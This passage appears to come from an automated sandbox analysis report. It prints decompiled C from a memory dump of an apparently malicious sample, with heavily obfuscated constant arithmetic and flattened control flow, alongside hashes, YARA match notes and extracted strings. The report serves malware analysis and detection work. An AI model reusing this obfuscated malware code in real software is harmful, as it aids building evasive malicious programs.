                          • Opcode Fuzzy Hash: c4b8ffe6adaf62c1785deb87219a619191e699547ebea83a3142d318512e0edb
                          • Instruction Fuzzy Hash: 296220715083819FD374CF25C48AB9FBBE2BBD4318F108A1DE6DA96260D7B58949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 012240FE, Relevance: 11.6, Strings: 9, Instructions: 319COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E012240FE(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				void* _t331;
				void* _t375;
				signed int _t382;
				void* _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int* _t416;

				_push(_a12);
				_t407 = 0;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0121358A(_t331);
				_v1680 = 0xecc6df;
				_t416 =  &(( &_v1708)[5]);
				_t375 = 0x2bbbb5c;
				_t408 = 0x4f;
				_v1680 = _v1680 / _t408;
				_t409 = 0x69;
				_v1680 = _v1680 / _t409;
				_t410 = 0x29;
				_v1680 = _v1680 / _t410;
				_v1680 = _v1680 ^ 0x00000004;
				_v1672 = 0xf0f001;
				_v1672 = _v1672 << 5;
				_v1672 = _v1672 + 0xae5;
				_v1672 = _v1672 << 9;
				_v1672 = _v1672 ^ 0x3c166f75;
				_v1592 = 0xef70fc;
				_v1592 = _v1592 ^ 0x00e587e5;
				_v1600 = 0xc7a853;
				_v1600 = _v1600 >> 2;
				_v1600 = _v1600 ^ 0x003a93a3;
				_v1604 = 0x8b40bb;
				_v1604 = _v1604 + 0xfffff760;
				_v1604 = _v1604 ^ 0x008a5254;
				_v1700 = 0x24f303;
				_v1700 = _v1700 << 0xd;
				_v1700 = _v1700 + 0x1ce0;
				_v1700 = _v1700 ^ 0x887eb559;
				_v1700 = _v1700 ^ 0x161c5beb;
				_v1668 = 0x1c09b;
				_v1668 = _v1668 + 0xffff9686;
				_t411 = 0x5a;
				_v1668 = _v1668 * 0x4f;
				_v1668 = _v1668 | 0x6f375f79;
				_v1668 = _v1668 ^ 0x6f732305;
				_v1648 = 0x526155;
				_t68 =  &_v1648; // 0x526155
				_v1648 =  *_t68 / _t411;
				_t74 =  &_v1648; // 0x526155
				_v1648 =  *_t74 * 0x60;
				_v1648 = _v1648 ^ 0x0055ba2e;
				_v1568 = 0x4a97ea;
				_v1568 = _v1568 + 0x2d7f;
				_v1568 = _v1568 ^ 0x00446384;
				_v1624 = 0xc328b6;
				_v1624 = _v1624 >> 6;
				_v1624 = _v1624 << 6;
				_v1624 = _v1624 ^ 0x00caf265;
				_v1676 = 0x3bb87e;
				_v1676 = _v1676 + 0xffff6c80;
				_v1676 = _v1676 + 0xffff9524;
				_v1676 = _v1676 + 0xb2c3;
				_v1676 = _v1676 ^ 0x00310521;
				_v1640 = 0x4e39af;
				_v1640 = _v1640 + 0xdee0;
				_v1640 = _v1640 + 0xffffeea0;
				_v1640 = _v1640 ^ 0x0045c51b;
				_v1596 = 0x52ccd5;
				_v1596 = _v1596 + 0xffff320b;
				_v1596 = _v1596 ^ 0x005c4e46;
				_v1616 = 0xf0f3d9;
				_v1616 = _v1616 + 0xffff715e;
				_t412 = 0x3f;
				_v1616 = _v1616 * 0x30;
				_v1616 = _v1616 ^ 0x2d12086a;
				_v1660 = 0x386db;
				_v1660 = _v1660 + 0xffff8cc4;
				_v1660 = _v1660 + 0x498d;
				_v1660 = _v1660 + 0x2c05;
				_v1660 = _v1660 ^ 0x00039de5;
				_v1632 = 0xb94b21;
				_v1632 = _v1632 + 0xffff4c5b;
				_v1632 = _v1632 | 0xe8e62b69;
				_v1632 = _v1632 ^ 0xe8ff0f89;
				_v1608 = 0x9c5f73;
				_v1608 = _v1608 | 0x895c27c8;
				_v1608 = _v1608 ^ 0x89d87d16;
				_v1692 = 0xe8cb31;
				_v1692 = _v1692 * 0x48;
				_v1692 = _v1692 >> 0xb;
				_v1692 = _v1692 >> 3;
				_v1692 = _v1692 ^ 0x0006842c;
				_v1708 = 0xfe5917;
				_v1708 = _v1708 | 0xb795fffe;
				_v1708 = _v1708 + 0xffff65ed;
				_v1708 = _v1708 ^ 0xb7f6fe94;
				_v1652 = 0xd35f26;
				_v1652 = _v1652 >> 8;
				_v1652 = _v1652 + 0xffffa85d;
				_v1652 = _v1652 ^ 0x000fd654;
				_v1684 = 0x27517b;
				_v1684 = _v1684 + 0xb977;
				_v1684 = _v1684 >> 0xd;
				_v1684 = _v1684 << 7;
				_v1684 = _v1684 ^ 0x000ec1c8;
				_v1636 = 0x26e56b;
				_v1636 = _v1636 >> 4;
				_v1636 = _v1636 + 0xb334;
				_v1636 = _v1636 ^ 0x000b354a;
				_v1696 = 0x89fe17;
				_v1696 = _v1696 + 0xffffbbc1;
				_v1696 = _v1696 ^ 0x5075d2e6;
				_v1696 = _v1696 | 0x813b6067;
				_v1696 = _v1696 ^ 0xd1f21b8c;
				_v1564 = 0x14e340;
				_v1564 = _v1564 * 0x12;
				_v1564 = _v1564 ^ 0x01745609;
				_v1644 = 0x6df290;
				_v1644 = _v1644 | 0xf494ce0e;
				_v1644 = _v1644 + 0xb612;
				_v1644 = _v1644 ^ 0xf4ff3c1d;
				_v1704 = 0x9cf2ce;
				_v1704 = _v1704 + 0x46da;
				_v1704 = _v1704 + 0xffffda6c;
				_v1704 = _v1704 | 0x89d54bb7;
				_v1704 = _v1704 ^ 0x89d09b04;
				_v1588 = 0x49e131;
				_t209 =  &_v1588; // 0x49e131
				_v1588 =  *_t209 / _t412;
				_v1588 = _v1588 ^ 0x000d8a6e;
				_v1572 = 0x93642;
				_t218 =  &_v1572; // 0x93642
				_v1572 =  *_t218 * 0x39;
				_v1572 = _v1572 ^ 0x0209c809;
				_v1580 = 0x50d007;
				_v1580 = _v1580 | 0x2637a38d;
				_v1580 = _v1580 ^ 0x2675adab;
				_v1688 = 0x9d1e8f;
				_v1688 = _v1688 + 0x8b64;
				_v1688 = _v1688 << 0xb;
				_v1688 = _v1688 ^ 0xc479de2b;
				_v1688 = _v1688 ^ 0x293a1d3c;
				_v1620 = 0x2368c2;
				_v1620 = _v1620 ^ 0x12e92793;
				_v1620 = _v1620 + 0xffffecf1;
				_v1620 = _v1620 ^ 0x12cded03;
				_v1628 = 0xbb0a3e;
				_v1628 = _v1628 << 0xc;
				_v1628 = _v1628 | 0x8e0ba2db;
				_v1628 = _v1628 ^ 0xbeace13e;
				_v1576 = 0x861d4d;
				_v1576 = _v1576 + 0xffffc741;
				_v1576 = _v1576 ^ 0x008649c7;
				_v1612 = 0x27acf0;
				_v1612 = _v1612 * 0x11;
				_v1612 = _v1612 + 0x5464;
				_v1612 = _v1612 ^ 0x02ab43ea;
				_v1656 = 0xee29c8;
				_v1656 = _v1656 ^ 0x7fc9f939;
				_v1656 = _v1656 << 6;
				_v1656 = _v1656 * 0x35;
				_v1656 = _v1656 ^ 0xcf9fbfa9;
				_v1664 = 0xf6dd0c;
				_v1664 = _v1664 * 0x73;
				_v1664 = _v1664 | 0xdfbb7ddf;
				_v1664 = _v1664 ^ 0xfff795d4;
				_v1584 = 0x8afb45;
				_v1584 = _v1584 ^ 0x186a0676;
				_v1584 = _v1584 ^ 0x18ecce65;
				L1:
				while(_t375 != 0x2bbbb5c) {
					if(_t375 == 0x5f559ea) {
						_push(_v1684);
						_push(_v1652);
						_t413 = E0122CD35(0x1211130, _v1708, __eflags);
						E012323F2( &_v1560, __eflags);
						E0122BEAA(_v1636, __eflags,  &_v520,  &_v1560, _v1696,  &_v1040, _v1564, _v1644, _v1704, _v1588, _t407,  *0x1235218 + 0x18, _t355, _v1572,  *0x1235218 + 0x234);
						_push(_v1628);
						_push(_v1620);
						_push(_v1688);
						_t382 = _v1580;
						L8:
						E0122629F(_t382, _t413);
						_t416 =  &(_t416[0x10]);
						_t375 = 0xff417d9;
						continue;
					}
					if(_t375 == 0x8158fbb) {
						_push(_v1648);
						_push(_v1668);
						_t413 = E0122CD35(0x1211020, _v1700, __eflags);
						E012323F2( &_v1560, __eflags);
						__eflags =  *0x1235218 + 0x234;
						E0122E35F( *0x1235218 + 0x18,  *0x1235218 + 0x234, _v1568, _v1624, _v1676, 0x104, _v1640,  &_v520,  &_v1560, _t365, _v1596,  *0x1235218 + 0x234, _v1616);
						_push(_v1692);
						_push(_v1608);
						_push(_v1632);
						_t382 = _v1660;
						goto L8;
					}
					if(_t375 == 0xff417d9) {
						_push(_t375);
						__eflags = E0122EA55( &_v520, _v1576, __eflags, _v1612, _t407, _v1656, _t407, _v1664, _v1584, _t407);
						_t407 =  !=  ? 1 : _t407;
					} else {
						if(_t375 != 0x299b4b9) {
							continue;
						} else {
						}
					}
					return _t407;
				}
				E0121B3B4(_v1672, _t375, _v1592, _t375, _v1600,  &_v1040, _v1604, _v1680);
				_t416 =  &(_t416[7]);
				_t375 = 0x8158fbb;
				goto L1;
			}





















































                          0x01224108
                          0x0122410f
                          0x01224111
                          0x01224118
                          0x0122411f
                          0x01224120
                          0x01224121
                          0x01224126
                          0x0122412e
                          0x01224137
                          0x0122413e
                          0x01224143
                          0x0122414d
                          0x01224152
                          0x0122415c
                          0x01224161
                          0x01224167
                          0x0122416c
                          0x01224174
                          0x01224179
                          0x01224181
                          0x01224186
                          0x0122418e
                          0x012241a7
                          0x012241b2
                          0x012241bd
                          0x012241c5
                          0x012241d0
                          0x012241d8
                          0x012241e0
                          0x012241e8
                          0x012241f0
                          0x012241f5
                          0x012241fd
                          0x01224205
                          0x0122420d
                          0x01224215
                          0x01224222
                          0x01224223
                          0x01224227
                          0x0122422f
                          0x01224237
                          0x0122423f
                          0x01224245
                          0x01224249
                          0x0122424e
                          0x01224252
                          0x0122425a
                          0x01224265
                          0x01224270
                          0x0122427b
                          0x01224283
                          0x01224288
                          0x0122428d
                          0x01224295
                          0x0122429d
                          0x012242a5
                          0x012242ad
                          0x012242b5
                          0x012242bd
                          0x012242c7
                          0x012242cf
                          0x012242d7
                          0x012242df
                          0x012242ea
                          0x012242f5
                          0x01224300
                          0x01224308
                          0x01224317
                          0x01224318
                          0x0122431c
                          0x01224324
                          0x0122432c
                          0x01224334
                          0x0122433c
                          0x01224344
                          0x0122434c
                          0x01224354
                          0x0122435c
                          0x01224364
                          0x0122436c
                          0x01224374
                          0x0122437c
                          0x01224384
                          0x01224391
                          0x01224395
                          0x0122439a
                          0x0122439f
                          0x012243a7
                          0x012243af
                          0x012243b7
                          0x012243bf
                          0x012243c7
                          0x012243cf
                          0x012243d4
                          0x012243dc
                          0x012243e4
                          0x012243ec
                          0x012243f4
                          0x012243f9
                          0x012243fe
                          0x01224406
                          0x0122440e
                          0x01224413
                          0x0122441b
                          0x01224423
                          0x0122442b
                          0x01224433
                          0x0122443b
                          0x01224443
                          0x0122444b
                          0x0122445e
                          0x01224465
                          0x01224470
                          0x01224478
                          0x01224480
                          0x01224488
                          0x01224490
                          0x01224498
                          0x012244a0
                          0x012244a8
                          0x012244b0
                          0x012244b8
                          0x012244c3
                          0x012244cc
                          0x012244d3
                          0x012244de
                          0x012244e9
                          0x012244f1
                          0x012244f8
                          0x01224503
                          0x0122450e
                          0x01224519
                          0x01224524
                          0x0122452c
                          0x01224539
                          0x01224543
                          0x0122454b
                          0x01224553
                          0x0122455b
                          0x01224563
                          0x0122456b
                          0x01224573
                          0x0122457b
                          0x01224580
                          0x01224588
                          0x01224590
                          0x0122459b
                          0x012245a6
                          0x012245b1
                          0x012245be
                          0x012245c2
                          0x012245ca
                          0x012245d2
                          0x012245da
                          0x012245e2
                          0x012245ec
                          0x012245f0
                          0x012245f8
                          0x01224605
                          0x01224609
                          0x01224611
                          0x01224619
                          0x01224624
                          0x0122462f
                          0x00000000
                          0x0122463a
                          0x0122464c
                          0x01224710
                          0x01224719
                          0x0122472f
                          0x01224731
                          0x0122478c
                          0x01224791
                          0x01224798
                          0x0122479f
                          0x012247a3
                          0x012246ff
                          0x01224701
                          0x01224706
                          0x01224709
                          0x00000000
                          0x01224709
                          0x01224654
                          0x0122466b
                          0x01224674
                          0x01224688
                          0x0122468a
                          0x0122469f
                          0x012246e1
                          0x012246e6
                          0x012246ea
                          0x012246f1
                          0x012246f8
                          0x00000000
                          0x012246f8
                          0x01224658
                          0x012247e2
                          0x01224815
                          0x01224817
                          0x0122465e
                          0x01224664
                          0x00000000
                          0x00000000
                          0x01224666
                          0x01224664
                          0x01224826
                          0x01224826
                          0x012247d3
                          0x012247d8
                          0x012247db
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1I$B6$FN\$UaR$dT$i+$k&$y_7o${Q'
                          • API String ID: 0-1837524644
                          • Opcode ID: 6f7ffe41c4734a6e2b1ad010cd13725f79c907a217895663320d4a503fbfe824
                          • Instruction ID: 40026adffc6cd4f3e251d9fd9d0425d88169c31e1165e60dcb7ee5c85dc45ecf
                          • Opcode Fuzzy Hash: 6f7ffe41c4734a6e2b1ad010cd13725f79c907a217895663320d4a503fbfe824
                          • Instruction Fuzzy Hash: 9B0201714083819FD7A8CF65C48AA9FBBE1FBD5718F008A1DE2D986260D7B58549CF03
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01224CF5, Relevance: 11.5, Strings: 9, Instructions: 287COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E01224CF5(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v12;
				char _v16;
				char _v36;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v88;
				signed int _v92;
				char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				void* _t259;
				void* _t288;
				void* _t290;
				signed int _t292;
				char* _t294;
				signed int _t295;
				signed int _t297;
				intOrPtr _t305;
				intOrPtr* _t308;
				void* _t310;
				signed int _t311;
				intOrPtr _t314;
				intOrPtr _t348;
				intOrPtr* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int* _t362;

				_t350 = _a12;
				_t308 = __ecx;
				_push(_t350);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0121358A(_t259);
				_v80 = 0xd3edc3;
				_t362 =  &(( &_v184)[5]);
				_v76 = 0x5e605a;
				_t348 = 0;
				_v72 = 0x201dcb;
				_v68 = 0;
				_t310 = 0x8aa177e;
				_v148 = 0xb76f6d;
				_v148 = _v148 >> 0x10;
				_v148 = _v148 + 0x18ab;
				_t351 = 0x1e;
				_v148 = _v148 / _t351;
				_v148 = _v148 ^ 0x000000d8;
				_v116 = 0x6b0077;
				_t352 = 0x43;
				_v116 = _v116 / _t352;
				_t353 = 0x1b;
				_v116 = _v116 / _t353;
				_v116 = _v116 ^ 0x00000f34;
				_v156 = 0x38872e;
				_v156 = _v156 + 0xffff918e;
				_t354 = 0x3b;
				_v156 = _v156 / _t354;
				_v156 = _v156 + 0xffff85b1;
				_v156 = _v156 ^ 0x000d6d44;
				_v172 = 0x452f09;
				_v172 = _v172 + 0x4173;
				_v172 = _v172 + 0x5770;
				_v172 = _v172 | 0x316460a7;
				_v172 = _v172 ^ 0x316bcae2;
				_v108 = 0x3bea79;
				_v108 = _v108 | 0x81cfa252;
				_v108 = _v108 ^ 0x81fbf3ab;
				_v124 = 0xa928d9;
				_v124 = _v124 << 6;
				_v124 = _v124 | 0x6a232946;
				_v124 = _v124 ^ 0x6a67a584;
				_v140 = 0x984825;
				_v140 = _v140 ^ 0x456e5524;
				_v140 = _v140 >> 0xe;
				_v140 = _v140 ^ 0x00012cd5;
				_v112 = 0x5ddb92;
				_v112 = _v112 + 0xffff4224;
				_v112 = _v112 + 0x8c78;
				_v112 = _v112 ^ 0x00508e10;
				_v180 = 0x117291;
				_v180 = _v180 + 0xffffe0b6;
				_t355 = 0x1e;
				_v180 = _v180 * 0x22;
				_v180 = _v180 / _t355;
				_v180 = _v180 ^ 0x0010096b;
				_v128 = 0x2232b8;
				_v128 = _v128 | 0x861d190a;
				_t356 = 0x1b;
				_v128 = _v128 / _t356;
				_v128 = _v128 ^ 0x04f1c2b9;
				_v184 = 0x193996;
				_t357 = 0x5b;
				_v184 = _v184 * 0x73;
				_v184 = _v184 + 0xffffa085;
				_v184 = _v184 | 0x88b629a7;
				_v184 = _v184 ^ 0x8bff06e0;
				_v164 = 0x969355;
				_v164 = _v164 >> 0xb;
				_v164 = _v164 * 0x1f;
				_v164 = _v164 + 0xffff37be;
				_v164 = _v164 ^ 0x0000e5b0;
				_v132 = 0x3ff47d;
				_v132 = _v132 >> 0x10;
				_v132 = _v132 + 0xffff6f11;
				_v132 = _v132 ^ 0xfff834b1;
				_v160 = 0x3ec58e;
				_v160 = _v160 | 0x66c27e62;
				_v160 = _v160 * 0x31;
				_v160 = _v160 + 0xffff85ff;
				_v160 = _v160 ^ 0xb6c79e62;
				_v104 = 0xeb81be;
				_v104 = _v104 / _t357;
				_v104 = _v104 ^ 0x00072f15;
				_v168 = 0xb75583;
				_v168 = _v168 + 0x12dd;
				_t358 = 0x36;
				_v168 = _v168 / _t358;
				_t359 = 0x13;
				_v168 = _v168 / _t359;
				_v168 = _v168 ^ 0x00071b18;
				_v176 = 0xdeab00;
				_v176 = _v176 * 0x16;
				_v176 = _v176 * 0x1e;
				_v176 = _v176 << 7;
				_v176 = _v176 ^ 0x086543d8;
				_v136 = 0x6f9847;
				_v136 = _v136 ^ 0xbf126c38;
				_v136 = _v136 + 0xffff2dd4;
				_v136 = _v136 ^ 0xbf77b4f6;
				_v120 = 0x2e3775;
				_v120 = _v120 << 0x10;
				_v120 = _v120 >> 8;
				_v120 = _v120 ^ 0x00362632;
				_v152 = 0x484ea5;
				_v152 = _v152 + 0xffff4c40;
				_v152 = _v152 + 0xffff3acc;
				_v152 = _v152 << 0xd;
				_v152 = _v152 ^ 0xdab37ebc;
				_v100 = 0x9800f0;
				_v100 = _v100 >> 4;
				_v100 = _v100 ^ 0x00041cf0;
				_v144 = 0xf6edc9;
				_v144 = _v144 * 0x29;
				_v144 = _v144 >> 0xf;
				_v144 = _v144 >> 1;
				_v144 = _v144 ^ 0x00051e01;
				while(_t310 != 0x26f300b) {
					if(_t310 == 0x3aef716) {
						_t290 = E0122B677(_v156,  &_v88, _v172,  &_v96, _v108, _v124);
						_t362 =  &(_t362[4]);
						if(_t290 == 0) {
							L26:
							return _t348;
						}
						_t310 = 0x7fc7eaa;
						continue;
					}
					if(_t310 == 0x7562fb8) {
						_t292 =  *((intOrPtr*)(_t308 + 4));
						_t314 =  *_t308;
						_v92 = _t292;
						_v96 = _t314;
						_t294 = _t292 - 1 + _t314;
						while(_t294 > _t314) {
							if( *_t294 == 0) {
								break;
							}
							_t294 = _t294 - 1;
						}
						_t295 = _t294 - _t314;
						_v92 = _t295;
						if(_t295 == 0) {
							L16:
							_t310 = 0x3aef716;
							continue;
						}
						while(_v92 % _v116 != _v148) {
							_t230 =  &_v92;
							 *_t230 = _v92 - 1;
							if( *_t230 != 0) {
								continue;
							}
							goto L16;
						}
						goto L16;
					}
					if(_t310 == 0x7fc7eaa) {
						_t297 = E0122E10A( &_v64, _v140,  &_v88, _v112, _v180);
						_t362 =  &(_t362[3]);
						asm("sbb ecx, ecx");
						_t310 = ( ~_t297 & 0xf9d2b2b1) + 0x89c7d5a;
						continue;
					}
					if(_t310 == 0x89c7d5a) {
						E0121AE43(_v88, _v100, _v144);
						goto L26;
					}
					if(_t310 != 0x8aa177e) {
						L23:
						if(_t310 != 0x4f66e9f) {
							continue;
						}
						goto L26;
					}
					_t310 = 0x7562fb8;
				}
				_t311 = _v128;
				_t288 = E01220E97(_t311, _v184,  &_v16, _v164,  &_v36, _v132);
				_t362 =  &(_t362[4]);
				if(_t288 != 0) {
					_push(_t311);
					_push(_t311);
					_t305 = E01225212(_v12);
					_t362 =  &(_t362[3]);
					 *_t350 = _t305;
					if(_t305 != 0) {
						E01232C81(_v136, _v16, _v120,  *_t350, _v152, _v12);
						_t362 =  &(_t362[4]);
						 *((intOrPtr*)(_t350 + 4)) = _v12;
						_t348 = 1;
					}
				}
				_t310 = 0x89c7d5a;
				goto L23;
			}




























































                          0x01224cfe
                          0x01224d05
                          0x01224d08
                          0x01224d09
                          0x01224d10
                          0x01224d17
                          0x01224d18
                          0x01224d19
                          0x01224d1e
                          0x01224d29
                          0x01224d2c
                          0x01224d34
                          0x01224d36
                          0x01224d43
                          0x01224d4a
                          0x01224d4f
                          0x01224d57
                          0x01224d5c
                          0x01224d6a
                          0x01224d6f
                          0x01224d75
                          0x01224d7d
                          0x01224d89
                          0x01224d8e
                          0x01224d98
                          0x01224d9d
                          0x01224da3
                          0x01224dab
                          0x01224db3
                          0x01224dbf
                          0x01224dc4
                          0x01224dc8
                          0x01224dd0
                          0x01224dd8
                          0x01224de0
                          0x01224de8
                          0x01224df0
                          0x01224df8
                          0x01224e00
                          0x01224e08
                          0x01224e10
                          0x01224e18
                          0x01224e20
                          0x01224e25
                          0x01224e2d
                          0x01224e35
                          0x01224e3d
                          0x01224e45
                          0x01224e4a
                          0x01224e52
                          0x01224e5a
                          0x01224e62
                          0x01224e6a
                          0x01224e72
                          0x01224e7a
                          0x01224e89
                          0x01224e8a
                          0x01224e96
                          0x01224e9c
                          0x01224ea4
                          0x01224eac
                          0x01224eb8
                          0x01224ebd
                          0x01224ec3
                          0x01224ecb
                          0x01224ed8
                          0x01224edb
                          0x01224edf
                          0x01224ee7
                          0x01224eef
                          0x01224ef7
                          0x01224eff
                          0x01224f09
                          0x01224f0d
                          0x01224f15
                          0x01224f1d
                          0x01224f25
                          0x01224f2a
                          0x01224f32
                          0x01224f3a
                          0x01224f42
                          0x01224f4f
                          0x01224f53
                          0x01224f5b
                          0x01224f63
                          0x01224f73
                          0x01224f77
                          0x01224f7f
                          0x01224f87
                          0x01224f93
                          0x01224f98
                          0x01224fa2
                          0x01224fa5
                          0x01224fa9
                          0x01224fb1
                          0x01224fbe
                          0x01224fc7
                          0x01224fcb
                          0x01224fd0
                          0x01224fd8
                          0x01224fe0
                          0x01224fe8
                          0x01224ff0
                          0x01224ff8
                          0x01225000
                          0x01225005
                          0x0122500a
                          0x01225012
                          0x0122501a
                          0x01225022
                          0x0122502a
                          0x0122502f
                          0x01225037
                          0x0122503f
                          0x01225044
                          0x0122504c
                          0x0122505e
                          0x01225062
                          0x01225067
                          0x0122506b
                          0x01225073
                          0x01225085
                          0x01225145
                          0x0122514a
                          0x0122514f
                          0x01225205
                          0x01225211
                          0x01225211
                          0x01225155
                          0x00000000
                          0x01225155
                          0x01225091
                          0x012250e6
                          0x012250e9
                          0x012250eb
                          0x012250f0
                          0x012250f4
                          0x012250fe
                          0x012250fb
                          0x00000000
                          0x00000000
                          0x012250fd
                          0x012250fd
                          0x01225102
                          0x01225104
                          0x01225108
                          0x01225122
                          0x01225122
                          0x00000000
                          0x01225122
                          0x0122510a
                          0x0122511c
                          0x0122511c
                          0x01225120
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01225120
                          0x00000000
                          0x0122510a
                          0x01225099
                          0x012250ce
                          0x012250d3
                          0x012250da
                          0x012250e2
                          0x00000000
                          0x012250e2
                          0x0122509d
                          0x012251ff
                          0x00000000
                          0x01225204
                          0x012250a9
                          0x012251e5
                          0x012251eb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x012251f1
                          0x012250af
                          0x012250af
                          0x0122517a
                          0x0122517f
                          0x01225184
                          0x01225189
                          0x0122519b
                          0x0122519c
                          0x012251a4
                          0x012251a9
                          0x012251ac
                          0x012251b0
                          0x012251ce
                          0x012251dc
                          0x012251df
                          0x012251e2
                          0x012251e2
                          0x012251b0
                          0x012251e3
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /E$$UnE$2&6$Dm$F)#j$Z`^$pW$w$y;
                          • API String ID: 0-2659286561
                          • Opcode ID: eb232d921aa259a47cfbb9dac2200ea62c64db5d62b80a9a6b33fc8c66c40815
                          • Instruction ID: 08e884f9d09f1a6ea4cd0c28f05fd6851b142dee3f709b408968a99b1f1221d1
                          • Opcode Fuzzy Hash: eb232d921aa259a47cfbb9dac2200ea62c64db5d62b80a9a6b33fc8c66c40815
                          • Instruction Fuzzy Hash: 99D15271518385ABD364CF25C889A5FFBE1FBD4348F508A1DF686862A0D7B5CA48CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F236070, Relevance: 10.9, Strings: 8, Instructions: 927COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: " fn( -> = { }truefalse{0x$)C,$?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$H$_$_$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
                          • API String ID: 0-4270729952
                          • Opcode ID: 83646f4b9a3d8592e7727599b986669a2f3154c3059c58a104c9e16bd417c6b6
                          • Instruction ID: 9043d264c0d410e3356a30c3c60cf93610fca28076524a9e82bc79912c7d23c1
                          • Opcode Fuzzy Hash: 83646f4b9a3d8592e7727599b986669a2f3154c3059c58a104c9e16bd417c6b6
                          • Instruction Fuzzy Hash: BE6218F6F0832D8BDB148E24D490B5ABBE6AF82745F04853DE8994B381D775E845CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F2377B4, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 423COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6F2377C2, 6F237C19
                          • {recursion limit reached}{invalid syntax}, xrefs: 6F237DC6
                          • called `Option::unwrap()` on a `None` value, xrefs: 6F237B7C
                          • bool, xrefs: 6F237A4B
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __aulldiv__aullrem
                          • String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$bool$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
                          • API String ID: 3839614884-433696047
                          • Opcode ID: a547752b926dc6b9854c29963db587fb943bca5d347b0ccbae457853551b18b0
                          • Instruction ID: 5032b97112508b2ab27809f7799454c8f97e87f89bb0db78f1c33a04932ec3e5
                          • Opcode Fuzzy Hash: a547752b926dc6b9854c29963db587fb943bca5d347b0ccbae457853551b18b0
                          • Instruction Fuzzy Hash: 6CE114F2A0C36ACFDB05CF28C49076AB7E1AF86314F04866ED4998B395D734A845CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0122970A, Relevance: 10.4, Strings: 8, Instructions: 412COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E0122970A(void* __ecx, void* __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
